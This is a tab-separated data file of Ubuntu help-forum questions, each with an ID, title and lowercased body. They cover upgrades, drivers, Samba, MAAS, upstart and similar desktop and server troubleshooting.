302388	upgrade ubuntu 11.10 to 12.04 without the button in update manager	i would like to upgrade from ubuntu 11.10 to 12.04 . i read the instructions , but the `` upgrade '' -button didnt occur within my update manager window . is there another way to upgrade ? would be delighted for your support ! enjoy your day ! co .
302393	phpmyadmin `` more settings '' option generates blank page	phpmyadmin works well except for a couple of links on the home page . there are two links to more settings , however they both take me to a blank page . am i missing a module , or does it need reinstalling ? the apache error.log reports : [ fri may 31 09:22:06 2013 ] [ notice ] caught sigterm , shutting down [ fri may 31 09:23:04 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.4.9-4ubuntu2 configured -- resuming normal operations [ fri may 31 11:14:32 2013 ] [ notice ] caught sigterm , shutting down [ fri may 31 11:15:52 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.4.9-4ubuntu2 configured -- resuming normal operations thanks
302395	get sensor values ubuntu touch	i 'm new to ubuntu applications and i 'm trying to make an application for ubuntu touch that reads the values from the sensors ( accelerometer , gyroscope , ... ) but i do n't know where to begin . which language to use ? qml , c++.. i 've done a thorough search around the web and i could n't find a single sample application using sensors in ubuntu touch . i 've tried to use qtmobility and the qtsensors plugin with qtcreator but it only runs the code on the desktop . when i try to run the app on the device a message saying that the modules are not installed appears . so , i do n't know if qtsensors is implemented in ubuntu touch or even if this is the right way to access sensors in ubuntu touch .
302397	is it right that cups-browsed uses 1327mb res memory ?	i 'm running gnome3 in raring . i have 4gb ram , but i 'm experiencing high use of swap . looking with htop i see ( among other processes ) : pid user pri ni virt res shr s cpu % mem % time+ command 1293 root 20 0 2078m 1325m 704 s 0.0 33.6 1:40.90 /usr/sbin/cups-browsed it looks weird : cups-browsed uses 1325mb of my ram ! ! if i had 1gb ram the system would be swapping a lot . searching for cups-browsed , i see it 's a deaemon that is needed ( ? ) for managing network printers . i actually have a wireless printer . may i safely uninstall cups-browsed ? any other hint ?
302399	using empathy with different subnets	is is posible to use empathy across diferent subnets ? i have it working perfectly on 192.168.1.x /24 , but i ca n't see other people on 192.168.2.x /24 . network is ok since i can ssh machines from 192.168.1.x to 192.168.2.x . how should i configure empathy ?
302401	is it possible to install ubuntu on my windows 8 computer without any cd or usb drive ?	read entire post carefully before answering . this question will make you confused if you do n't . information ( may skip : p ) os : windows nt 6.2 ( windows 8 k ) equipped hard disk total 1tb , 1 disk c : ( simple layout , ntfs , boot , pagefile , crash dump , main ) : total 488,039,776,256 bytes , used 93,473,599,488 bytes d : ( simple layout , ntfs , main ) : total 486,859,075,584 bytes , used 8,426,016,768 bytes hidden : ask if needed brand ( manufacturer ) : samsung electronics processor ( cpu ) : intel ( r ) core ( tm ) i5-3230m cpu @ 2.60ghz ram : 8gb , 64-bit , os 64-bit question ( read them all very carefully ) is there any way to install ubuntu on this computer without any external disk ( cd , usb drive , etc ) note : this computer is 64-bit , so this issue did not help me . wubi does not support uefi , and this computer uses it . no virtual pc programs like virtualbox or vmware , because it takes memory . edit : i already found a usb drive in my home , so now it is installed on my computer xd
302402	ca n't reformat my drive	when trying to reformat my drive to fat to install a windows os it comes up with `` the device is busy /dev/sda1 is mounted '' can anyone please give me any tips or guides on how to succesfully reformat my hdd ?
302406	go to meeting on ubuntu : possible , and if not , which alternative ?	problem in my company , an open source bpm solution editor , we use a lot go to meeting and go to training ( citrix ) for trainings . it works on windows , mac and ios , android . but not on linux . and it seems they will not support linux soon . i know that webex ( cisco ) supports linux , but is far more expensive and the cto told us `` no ! '' . thanks to the success of our open source solution , we have more and more demand for training with ubuntu desktop & server , and we would like to be able to do it . skype is not a solution , and google hangouts neither . question so , would you have any advice ? we need : sharing screen & webcam managing who speak ( mute , unmute ) a text chat up to 6 people connected + manager of the session record the session the ability to do some remote control over the internet would be a plus but is not compulsory if it is linux only , it is not a problem . if it is not free of charge , it must not cost much than go to training . there is an interesting comparison chart on wikipedia , however , there are too many to test them all . so if you have any feedback , you are welcome . reference http : //www.gotomeeting.com/fec/training/online_training http : //www.webex.com/ http : //en.wikipedia.org/wiki/comparison_of_web_conferencing_software
302409	limiting gpu cards in a sandbox type enviorment	i am designing a server that will run student 's cuda/c++ code . the server will have multiple gpu cards so that multiple programs can run at once . i would like to break up the computer in to sandboxes that only contain one gpu each ( such as using virtual machines or chroot or something else ) . i have read that virtual machines only emulate the gpus so you ca n't run cuda on the real hardware . is there a different way i can do this . i would like to also be able to limit other things within the sandbox but will try to figure that out after i figure out an approach that works well with the gpu . in general i am trying to limit the student to only access one gpu and to only access a gpu that is currently not running someone else 's code . i 'll have a queue set up to only run their program when a gpu is free .
302414	can i mount disc in windows style ?	i wish to use windows mount style in ubuntu , i.e . /c/ mount point /f/ mount point i know it is not about standards , but may ease user expluatation . does this method have any issues from technical side ?
302419	using ubuntu 12.04 lts no sound in select apps	i have ubuntu 12.04 lts and for some reason i get no sound whatsoever in a few programs . vlc , hydrogen , gnome mplayer , and movie player work fine , but banshee , rythmbox , chromium , konquerer and firefox have no sound . the system makes that bubble-thingy sound at startup and the system testing for the audio works . it 's all very strange . the problem affects the program no matter how i listen ( speakers or headphone jack ) on my laptop . i have tested/checked the alsamixer ( alsamixer ) to make sure that the sound is n't muted . this is rather annoying and i would like to fix it , help ! edit : here 's what i get in terminal when i start banshee via banshee [ info 18:00:10.944 ] running banshee 2.4.1 : [ ubuntu 12.04 lts ( linux-gnu , i686 ) @ 2012-07-17 02:32:36 utc ] [ warn 18:00:16.206 ] caught an exception - system.applicationexception : no support gnome settings daemon could be reached . ( in `banshee.multimediakeys ' ) at banshee.multimediakeys.multimediakeysservice.banshee.servicestack.iextensionservice.initialize ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.servicemanager.startextension ( mono.addins.typeextensionnode node ) [ 0x00000 ] in < filename unknown > :0 [ warn 18:00:16.207 ] extension `banshee.multimediakeys.multimediakeysservice ' not started : no support gnome settings daemon could be reached . [ info 18:00:16.229 ] updating web proxy from gconf [ warn 18:00:16.277 ] caught an exception - system.applicationexception : no support gnome settings daemon could be reached . ( in `banshee.multimediakeys ' ) at banshee.multimediakeys.multimediakeysservice.banshee.servicestack.iextensionservice.initialize ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.servicemanager.startextension ( mono.addins.typeextensionnode node ) [ 0x00000 ] in < filename unknown > :0 [ warn 18:00:16.277 ] extension `banshee.multimediakeys.multimediakeysservice ' not started : no support gnome settings daemon could be reached . [ info 18:00:16.279 ] all services are started 4.343458 [ info 18:00:17.015 ] amazonmp3 store redirect url : https : //one.ubuntu.com/music/store/amz/ [ info 18:00:18.672 ] nereid client started [ info 18:00:18.932 ] gstreamer version 0.10.36.0 , gapless : true , replaygain : false
302420	teamviewer will not connect to ubuntu 13.04 host	teamviewer on the windows 7 machine gets stuck with the `` connecting ... '' message when trying to connect to my ubuntu host . i have correctly ( to my knowledge ) set the -- passwd and gotten the daemon running in ubuntu . i have to start the daemon remotely as teamviewer by itself throws a wine error . daemon seems to start just fine . i have direct connection to the host over ssh , but i want teamviewer for a gui control over it . can someone give me a bit of guidance ? i do not have physical access to the machine ( at the moment , but i 'd prefer not having to go over there ) and want an easy gui connection . i 've heard teamviewer does not always play well with things running on port 80 , does that include web browsers and/or spotify ? i 'd prefer those stay open if possible . i am running on a dual-monitor display . 7 for 12.04 worked like a charm before i reinstalled ubuntu .
302422	an error occurred while copying a file into an archive folder	i am trying to drag .png files into a folder in a .jar archive . the error additionally occurs with .zips as well . i am running ubuntu 13.04 on an ext4 filesystem with default filemanager for gnome-shell . i have tried various archive managers to get this to work and none seem to cooperate . talking on irc , this apparently is not a common problem and none knew the answer . i 'm just trying to add textures into a minecraft.jar without having to extract and compress again ( which is completely possible with 7zip in windows ) .
302427	can i enhance the performance of ubuntu using a sd card by in anyways ?	i 'm just curious if it is possible do it . i have a spare 4gb sd card .
302429	with gpg -- verify , how do i distinguish valid signatures and valid signatures from trusted keys programmatically ?	i want to write a script that runs gpg -- verify to check a signature . the gpg command returns 1 for invalid signatures and 0 for valid ones . but it gives different output for keys that are in my trustdb and keys that are n't : gpg : warning : this key is not certified with a trusted signature ! gpg : there is no indication that the signature belongs to the owner . i want to run gpg in such a way that this warning is treated as an error , and without resorting to grepping the output . is that possible ? by the way : it 's fine if the solution requires me to use gpgme , but i have n't found anything related to the trustdb that looks remotely relevant in gpgme 's documentation yet .
302432	samba+powerbroker ( aka likewise-open ) integration not working	ubuntu : 12.04 x64 pbis : linux 2.4/2.6 kernel 64-bit deb ( from beyondtrust website ) samba : 3.6.3 ( from ubuntu repo ) we are having problems getting samba to integrate with powerbroker ( aka pbis/likewise-open ) . we followed these instructions : https : //help.ubuntu.com/12.04/serverguide/samba-ad-integration.html pbis is working . users are able to ssh and telnet into the machine and login using ad credentials . however , we can not get samba to authenticate against the ad . here is the log output : [ 2013/05/31 09:36:38.385857 , 0 ] rpc_client/cli_pipe_schannel.c:54 ( get_schannel_session_key_common ) get_schannel_session_key : could not fetch trust account password for domain 'example' [ 2013/05/31 09:36:38.386170 , 0 ] rpc_client/cli_pipe_schannel.c:184 ( cli_rpc_pipe_open_schannel ) cli_rpc_pipe_open_schannel : failed to get schannel session key from server dc2.example.com for domain example . [ 2013/05/31 09:36:38.386228 , 0 ] auth/auth_domain.c:193 ( connect_to_domain_password_server ) connect_to_domain_password_server : unable to open the domain client session to machine dc2.example.com . error was : nt_status_cant_access_domain_info . [ 2013/05/31 09:36:38.388088 , 0 ] rpc_client/cli_pipe_schannel.c:54 ( get_schannel_session_key_common ) get_schannel_session_key : could not fetch trust account password for domain 'example' [ 2013/05/31 09:36:38.388378 , 0 ] rpc_client/cli_pipe_schannel.c:184 ( cli_rpc_pipe_open_schannel ) cli_rpc_pipe_open_schannel : failed to get schannel session key from server dc2.example.com for domain example . [ 2013/05/31 09:36:38.388435 , 0 ] auth/auth_domain.c:193 ( connect_to_domain_password_server ) connect_to_domain_password_server : unable to open the domain client session to machine dc2.example.com . error was : nt_status_cant_access_domain_info . [ 2013/05/31 09:36:38.390201 , 0 ] rpc_client/cli_pipe_schannel.c:54 ( get_schannel_session_key_common ) get_schannel_session_key : could not fetch trust account password for domain 'example' [ 2013/05/31 09:36:38.390491 , 0 ] rpc_client/cli_pipe_schannel.c:184 ( cli_rpc_pipe_open_schannel ) cli_rpc_pipe_open_schannel : failed to get schannel session key from server dc2.example.com for domain example . [ 2013/05/31 09:36:38.390549 , 0 ] auth/auth_domain.c:193 ( connect_to_domain_password_server ) connect_to_domain_password_server : unable to open the domain client session to machine dc2.example.com . error was : nt_status_cant_access_domain_info . [ 2013/05/31 09:36:38.390831 , 0 ] auth/auth_domain.c:292 ( domain_client_validate ) domain_client_validate : domain password server not available . anyone have any ideas where to begin ?
302438	ca n't find -ltcl83	i am running ubuntu on virtual box and i 'm very new to it , i 'm trying to compile a bit of c code into a .py file but it cannont find -ltcl83 using locate libtcl it returns /usr/lib/libtcl8.5.so.0 i do n't know what to do or what other info to provide so please leave a comment about what else to include . thanks . update : actual error returned is : python.c : in function ‘util_autoload_from’ : python.c:376:7 : warning : ignoring return value of ‘chdir’ , declared with attribute warn_unused_result [ -wunused-result ] gcc -pthread -shared -wl , -o1 -wl , -bsymbolic-functions -wl , -bsymbolic-functions build/temp.linux-i686-2.7/python.o -l/usr/local/lib -ltcl83 -o build/lib.linux-i686-2.7/demo.so /usr/bin/ld : can not find -ltcl83 collect2 : ld returned 1 exit status error : command 'gcc ' failed with exit status 1
302440	ubuntu 12.04 making laptop super hot	hello i am using ubuntu 12.04 ( dual boot with windows . ) the laptop is getting really hot and fan starts running wildly on ubuntu even if no applications are open.windows 7 is running absolutely fine.no heating issue this thus lead to sudden shutdown of laptop laptop dell studio 15 r ram-4gb intel i5 processor graphic card ati radeon 0.5 gb ubuntu disk space-20 gb i searched the forum but and concluded either its a kernel problem or graphic problem i think may be its a graphic issue and hereby i attach an image which i think may be useful.do i need to install this drivers ? link : additional driver settings what can be the reason and how can i solve the heating issue ?
302441	mouse/touchpad settings for samsung series 9 in ubuntu 13.04	i 've just installed ubuntu 13.04 on my samsung series 9 , and i 'm having trackpad issues . the community page for the series 9 indicates that the trackpad ( including gestures , etc ) works out of the box , but i 'm unable to scroll with two fingers , min/max with three , etc . when i open up the mouse/trackpad settings , i see options that only relate to the mouse , almost as though a trackpad is not being detected : { not enough reputation points to post image , but i only have settings for 1 ) primary button , 2 ) double-click speed and 3 ) pointer speed } however , looking at the output from xinput list , the touchpad is certainly being detected : salexander @ sammy : ~ $ xinput list virtual core pointer id=2 [ master pointer ( 3 ) ] ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ↳ ps/2 elantech touchpad id=11 [ slave pointer ( 2 ) ] virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ webcam sc-13hdl11624n id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] any idea what could be going on ? any reason i would be having issues with the trackpad when the samsung series 9 community page indicates everything is alright ? googling did n't provide much help , and i could n't find any bug reports with this description ( i 'll be sure to create one ) . thanks in advance for the help !
302447	how to install zram on ubuntu 13.04 ?	i tried to install zram using the following commands in the terminal : sudo add-apt-repository ppa : shnatsel/zram sudo apt-get update sudo apt-get install zramswap-enabler but it throws the following error message which says that the package is not available : e : could n't find package zramswap-enabler i tried to download and install the zramswap-enabler_0.2.1-0~12~oneiric1_all.deb package , but after the second reboot it stops working .
302452	i have character on keyboard , but i ca n't input it	i ca n't enter character | , but i have this character on keyboard . i need this for java ( if x == 2 || x == 3 ) and second , not important question , but also - shift + 2 give me `` , not @ . this keys swiped . i am on lubuntu . please , give simple solution .
302458	vfat partition can not be mounted with x-gvfs-show option	got a problem with my laptop manufacturer 's partition . it 's fat32-formatted and fails under same curcumstances as for topic starter at here . it seems like vfat got a problem working with x-gvfs-show parameter . also , i seek for more `` painless '' solution then `` format-and-refill '' , because this one is created by the manufacturer and ( as far as i know ) got specific structure adapted for bios .
302459	error processing linux-generic-lts-quantal , dependency problems - leaving unconfigured	this happened during this mornings dist-upgrade along with apport failure . : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? setting up linux-image-3.5.0-32-generic ( 3.5.0-32.53~precise1 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.5.0-32-generic /boot/vmlinuz-3.5.0-32-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.5.0-32-generic /boot/vmlinuz-3.5.0-32-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-32-generic /boot/vmlinuz-3.5.0-32-generic update-initramfs : generating /boot/initrd.img-3.5.0-32-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.5.0-32-generic /boot/vmlinuz-3.5.0-32-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.5.0-32-generic /boot/vmlinuz-3.5.0-32-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.5.0-32-generic /boot/vmlinuz-3.5.0-32-generic /usr/sbin/grub-mkconfig : 36 : /etc/default/grub : syntax error : eof in backquote substitution run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.5.0-32-generic.postinst line 1010. dpkg : error processing linux-image-3.5.0-32-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic-lts-quantal : linux-image-generic-lts-quantal depends on linux-image-3.5.0-32-generic ; however : package linux-image-3.5.0-32-generic is not configured yet . dpkg : error processing linux-image-generic-lts-quantal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-lts-quantal : linux-generic-lts-quantal depends on linux-image-generic-lts-quantal ; however : package linux-image-generic-lts-quantal is not configured yet . dpkg : error processing linux-generic-lts-quantal ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-3.5.0-32-generic linux-image-generic-lts-quantal linux-generic-lts-quantal e : sub-process /usr/bin/dpkg returned an error code ( 1 ) on apport : https : //bugs.launchpad.net/ubuntu/+source/grub-pc/+filebug/f276b6c8-c9ff-11e2-ae36-68b5996a96c8 ? field.title=package+linux-image-3.5.0-32-generic+3.5.0-32.53~precise1+failed+to+install % 2fupgrade % 3a+run-parts % 3a+ % 2fetc % 2fkernel % 2fpostinst.d % 2fzz-update-grub+exited+with+return+code+2 and `` launchpad.net ~ lost something ? ~ this page does not exist , or you may not have permission to see it . '' this is a simple mythbuntu/xfce4 x86_64 system as part of a htpc .
302462	how to change the defaut settings of home folder ?	how to change the default settings of home folder ? in particular changing view > icon to view > list for all directories .
302465	how to allow guest session to access /home or other directories ?	i want the guest session to be able to access /home , maybe as read-only , and other directories as well .
302467	i ca n't use http proxy in the shell	i am a linux ubuntu user and i have some problem setting the proxy on my entire system . i go into the network settings of my gnome and then i go to the network proxy settings mask and then i put my proxy for the http proxy* as manual , then i click on the applies to the entire system button , it ask me my password and it is finish the problem is that if i open a shell , the network do n't work and i ca n't ping anyting , infact i obtain only : andrea @ andrea-studio-1555 : ~ $ ping google.com ping google.com ( 173.194.35.7 ) 56 ( 84 ) bytes of data . and the cursor still blink and do n't go on ... why ? what can i do to go out with my proxy in the shell ?
302469	how to list the source urls from saved html files from a folder ?	i have a lot of html files in a folder . i used them in a project . i want to build a references.txt file in which the url from which each html file was saved will be listed with the time stamp on which it was saved . there will be a space between each url and its corresponding timestamp . how can i do that from ubuntu 12.04 using a terminal command or shell script ? one information which can help you is that the url from which a html file was saved is present in the second line of the html file and that is also visible by opening the file in a browser and then going to source view . but i do n't know how to extract it from there using a command . first two lines from one of those files : < ! doctype html public `` -//w3c//dtd xhtml 1.0 strict//en '' `` http : //www.w3.org/tr/xhtml1/dtd/xhtml1-strict.dtd '' > < ! -- saved from url= ( 0084 ) http : //www.forexrealm.com/technical-analysis/technical-indicators/typical-price.html -- >
302471	how to keep your photos in sync with flickr ?	i have a ~/photos directory where i keep all my photos . i 'd like it to be automatically sync 'd to flickr ( with their recent generous expansion ... ) -- all pictures in this directory automatically uploaded to flickr ( visible to me only and without any manipulation/resizing ) . is there a tool for this job ? preferably , not some hacky python script in cron . right now , i 'm using shotwell to organise photos . and it works fine . it also has a flickr plugin but requires the pictures to be `` published '' manually and does n't seem to offer any way of organising them once on flickr . can it be somehow done with shotwell ? i would be perfectly happy with uploads happening only when i run shotwell , or even only when i prompt shotwell to sync , but so that i do n't have to figure out which pictures have n't yet been uploaded .
302472	installing ubuntu fails - hp pavilion t3000	any suggestions on how to get ubuntu onto this pc ? trying to install ubuntu on a desktop computer that ran winxp flawlessly - at least a couple of minutes ago - hehe : ) now , i 've tried running live cds with the option `` test ubuntu without installing '' for the following distributions : linux ubuntu 12.04 . - testinstance fails / screen goes black after option screen linux ubuntu 13.10 . - testinstance fails / screen goes black after option screen linux ubuntu 09.10 . - testinstance fails ... with some nasty error messages ( see photo below ) when - with ubuntu 09.10 . - i ran `` check disc for defects '' it actually found two errors . but that 's just a sidenote . further details : computer is a hp pavilion t3000 . here 's a photo of error messages :
302479	maas enlist nodes with pxe timeout	i am testing maas on ubuntu 13.04 32-bit , when booting a node with pxe for enlisting it times out after loading initrd.gz : loading i386/generic/raring/commisioning/linux ... ... .. loading i386/generic/raring/commisioning/initrd.gz ... ... .. boot failed : press a key to retry , or wait for reset ... pserv.log shows the following messages about a tftp timeout 2013-05-31 11:05:45-0500 [ tftp ( udp ) ] datagram received from ( '192.168.118.10 ' , 49165 ) : < rrqdatagram ( filename=i386/generic/raring/commissioning/initrd.gz , mode=octet , options= { 'tsize ' : '0 ' , 'blksize ' : '1408 ' } ) > 2013-05-31 11:05:45-0500 [ tftp ( udp ) ] datagram received from ( '192.168.118.10 ' , 49165 ) : < rrqdatagram ( filename=i386/generic/raring/commissioning/initrd.gz , mode=octet , options= { 'tsize ' : '0 ' , 'blksize ' : '1408 ' } ) > 2013-05-31 11:05:45-0500 [ - ] ( udp port 41794 closed ) 2013-05-31 11:05:45-0500 [ - ] ( udp port 41794 closed ) 2013-05-31 11:05:45-0500 [ - ] stopping protocol < tftp.bootstrap.remoteoriginreadsession instance at 0x94e758c > 2013-05-31 11:05:45-0500 [ - ] stopping protocol < tftp.bootstrap.remoteoriginreadsession instance at 0x94e758c > 2013-05-31 11:05:45-0500 [ - ] remoteoriginreadsession starting on 58310 2013-05-31 11:05:45-0500 [ - ] remoteoriginreadsession starting on 58310 2013-05-31 11:05:45-0500 [ - ] starting protocol < tftp.bootstrap.remoteoriginreadsession instance at 0x94e394c > 2013-05-31 11:05:45-0500 [ - ] starting protocol < tftp.bootstrap.remoteoriginreadsession instance at 0x94e394c > 2013-05-31 11:05:50-0500 [ - ] timed during option negotiation process 2013-05-31 11:05:50-0500 [ - ] timed during option negotiation process 2013-05-31 11:05:50-0500 [ - ] ( udp port 34113 closed ) 2013-05-31 11:05:50-0500 [ - ] ( udp port 34113 closed ) 2013-05-31 11:05:50-0500 [ - ] stopping protocol < tftp.bootstrap.remoteoriginreadsession instance at 0x94e750c > 2013-05-31 11:05:50-0500 [ - ] stopping protocol < tftp.bootstrap.remoteoriginreadsession instance at 0x94e750c > 2013-05-31 11:05:54-0500 [ - ] session timed out , last wait was 1 seconds long 2013-05-31 11:05:54-0500 [ - ] session timed out , last wait was 1 seconds long 2013-05-31 11:05:54-0500 [ - ] ( udp port 58310 closed ) 2013-05-31 11:05:54-0500 [ - ] ( udp port 58310 closed ) i found bug https : //bugs.launchpad.net/maas/+bug/1155556 and verified that the mentioned fixes are there also found maas not working , about the variable pserv_timeout , tried it anyway , no change . i am just starting to test maas , and maybe i am missing something basic , i would appreciate if somebody could help me thanks
302480	ca n't mount external drive after reformatting	i just bought a toshiba canvio 2tb external hard drive . i then installed gparted , and reformatted the drive to ext4 ( following the instructions in part 1 & 2 , at this blog ) . the instructions did n't say anything about this , but i think i should 've added a boot flag to the drive , 'cause now it wo n't automount , and gparted wo n't show the drive , and fdisk -l does n't even show the drive . so i 'm not sure how to mount it or find a way to add a boot flag ... if that 's even what i need to do . how do i get to where i can edit the drive 's partitions and stuff ? can i format the unallocated 1.02mb on the drive to boot ? the unallocated space does show up in gparted . i really hope i did n't just brick this $ 100 . update : here 's the output when i sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0003ae80 device boot start end blocks id system /dev/sda1 * 2048 969058303 484528128 83 linux /dev/sda2 969060350 976771071 3855361 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 969060352 976771071 3855360 82 linux swap / solaris ... the partition i formatted , was something like /dev/sdb or something like that , but it does n't show up .
302482	second monitor ( vga ) is n't detected ubuntu 12.04 ati radeon hd 5400	i have tried several solutions but nothing works . first of all , i 'm using ati radeon hd 5400 . the first monitor ( which works ) is connected to the graphic card by dvi , the second monitor ( which is n't detected ) is connected to the motherboard by vga . one important point - when i used windows ( yesterday ? ) the two monitor worked together fine . what i 've done until that moment : followed by the instructions here : https : //help.ubuntu.com/community/binarydriverhowto/ati # installation_via_the_ubuntu_repositories . installed fglrx by writing sudo apt-get install fglrx . then typed fglrxinfo in the terminal and got : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 5700 series opengl version string : 4.2.11903 compatibility profile context tried that solution : http : //askubuntu.com/a/281117 . i installed : http : //i.stack.imgur.com/jd9li.png and added in xorg.conf the following line : virtual 3600 3600 . system settings > details > graphics displays driver : vesa : juniper the second monitor is n't detected either by the catalysit control center nor by system setting > display . $ lspci | grep vga displays > > 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880 [ radeon hd 4200 ] 02:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati juniper [ radeon hd 5700 series ] the meaning is that it knows about the existence of the on-board graphic - radeon hd 4200 ( ? ) .
302486	i can not use my dvd in ubuntu 13.04	i have upgraded to ubuntu gnome 13.04 . but when i insert any dvd or cd to the drive , the system reads the drive but when it 's opened , it is totally blank . i have installed all the codecs including the restricted ones . i have also installed vlc and smplayer . but the problem persists . i use lg dvd writer with blue birds software . what 's wrong ?
302488	can i run steam as its own standalone session ?	i would like to run steam in a standalone mode so i do n't have to load a desktop and then run steam . i just want 100 % of my resources dedicated to the game . ideally it would just be a steam session that i can log into from the login screen . is this possible ?
302502	can i use the ubuntu sdk preview in linux mint ?	can i use linux mint to develop applications for ubuntu touch with the ubuntu sdk preview ?
302505	alternative to installing ubuntu from usb in imac5,1 with buggy eif that does not allow to boot from non hfs+ drives ?	*strong text*to put you into perspective : i 'm no newby and i 'm close to nuclear meltdown . i have tried to create a bootable usb stick using a 4gb stick and using the method with dd and the img file . the iso was the amd64 . my mac is an older imac white core duo ( thus a proper 64 bit system ) . i can create a dvd but it 's later not bootable ( i love mac , really ) and the same goes for an usb stick : dd works lovely , no error message but when trying to mount the darn thing it gives me a `` not bootable '' error and it will of course not boot from the thing . it 's not the medium as i have tried several stick and at least a dozen dvd and a few cd 's too . so , besides throwing the thing away and buying a proper pc is there any cheaper option ? thanks . btw : i have ubuntu working on an acer one notebook .
302506	sound/video playing in slow motion on 12.04 with bluetooth + chrome , but not firefox	i have been using the same plantronics bt headset with my hp laptop and bt usb dongle running 12.04 since 12.04 came out . just in the last week or two i have started to have a problem where playing sound through the headset when in chrome causes the sound ( and video if watching youtube or similar ) to play in slow motion . if i switch off of the bt headset and keep playing the sound , it stays in slow motion . if i refresh the page , it plays properly . i 've noticed this happening with google hangouts too . trying things in ff seems to be fine , and switching youtube to html5 does n't seem to help . this problem seems to coincide with a change to ubuntu that has given me two bt icons in my task bar instead of one . i tried researching why that happened and came up empty there too . this could be a straight up chrome issue , but i thought i would go the ubuntu + bt route for investigation first .
302507	ca n't run a make file of a c program	i have a small a program that should start a 2nd thread . the problem is that , when try to make an executable file of this program using make . i get : engine @ ubuntu : ~/desktop/lecture $ make thread cc thread.c -o thread thread.c : in function ‘main’ : thread.c:10:2 : error : unknown type name ‘pthread’ ... ... ... ... . here is my code : # include < stdio.h > # include < stdlib.h > # include < pthread.h > # include < errno.h > void *func ( void* ) ; int main ( ) { pthread tid ; if ( pthread_create ( & tid , null , fun , null ) ! = 0 ) { printf ( `` error by _ pthread \n '' ) ; } printf ( `` thread output1 \n '' ) ; sleep ( 1 ) ; return exit_success ; } void *fun ( void* data ) { printf ( `` thread output2 \n '' ) } i do n't think that program is wrong , it maybe the way i 'm running the make command ? any idea why do i get this . thanks in advance for your help
302514	upstart job fails to respawn and hangs when tried to stop/restart it	i 'm using upstart 1.5 in ubuntu 12.04 to manage a process created by some user but needs to be managed as system job as starting on boot , respawning if it fails and we been able to start/stop it at any desired time so , i create it 's .conf file in /etc/init and is as follows : description `` start face services recognition and monitors it '' version `` 1.0 '' start on runlevel [ 5 ] stop on runlevel [ 06 ] respawn expect fork normal exit 0 term stop script exec sh -c /home/verstand/facefeatures end script post-stop script if [ ! $ exit_status & & ! $ exit_signal ] then exec sudo -u $ user `` /sbin/shutdown -r now '' fi end script the signals here are intented to reboot the system in an emergency case where upstart fails to respawn the process . now , the problem is when we start the process it runs fine , with sudo initctl start facefeatures but when we try to stop it , it hangs and we need to use ctl+c to return tty control . even more , if we try to start it again or restart it , upstart reports it 's already running : start/running facefeatures but , if we use initctl list upstart reports as if the process was killed : stop/killed facefeatures also , if we reboot the first time it runs the process normally but if we reboot a second time it does it no more ... what is the problem of my conf file ? what is the correct way of doing this ?
302518	how to get an nvidia control panel ?	i have an nvidia geforce 9500 gs card on an ubuntu 13.04 os . downloaded the driver already but can not change perfomance settings my streaming video is very choppy.i cant even find system/administration/hardware drivers it doesnt exist . im new at this and having a hard time and would appreciate any input . thanx !
302531	package system broken	while attempting updates in 12.04 , i 'm getting the following error : the following packages have unmet dependencies : linux-generic : depends : linux-image-generic ( = 3.2.0.44.53 ) but 3.2.0.45.54 is installed depends : linux-headers-generic ( = 3.2.0.44.53 ) but 3.2.0.45.54 is installed i 've read other queries here , and tried various suggested solutions , such as disabling third party repositories , looking for broken packages in synaptic , trying sudo apt-get clean and sudo apt-get -f install etc. , without success .
302533	how to zip two files using 7zip via command line option	how to zip two files using 7zip via command line option . i want zip both files versioninfo.ini and summary.xml with name local.zip exmple 7za a -t7z local.7z versioninfo.ini summary.xml ( not working )
302534	new remote x session with x11vnc	i like to know how , if possible to remotely log into a brand new x session using a tunneled x11vnc e.g. , after reboot ? i 've just recently upgraded ubuntu 13.04 and have only managed remote desktop vnc access only if i am locally logged into the server .
302537	should i choose 32-bit or 64-bit to install ubuntu on a macbook pro laptop ?	which installation do i choose for apple macbook pro laptop , 32-bit or 64-bit ? my computer specs : 15-inch - mid/late 2007 - 2.4/2.2ghz
302542	two monitors - can i power down the unused second screen ?	i have a two monitor system and most of the time , i do not use the second monitor . my question is , is there a way of blanking the second screen until i click a button or enter a command ? why ? to save power and keep my wife happy ! 13.04 on a laptop with viewsonic external screen .
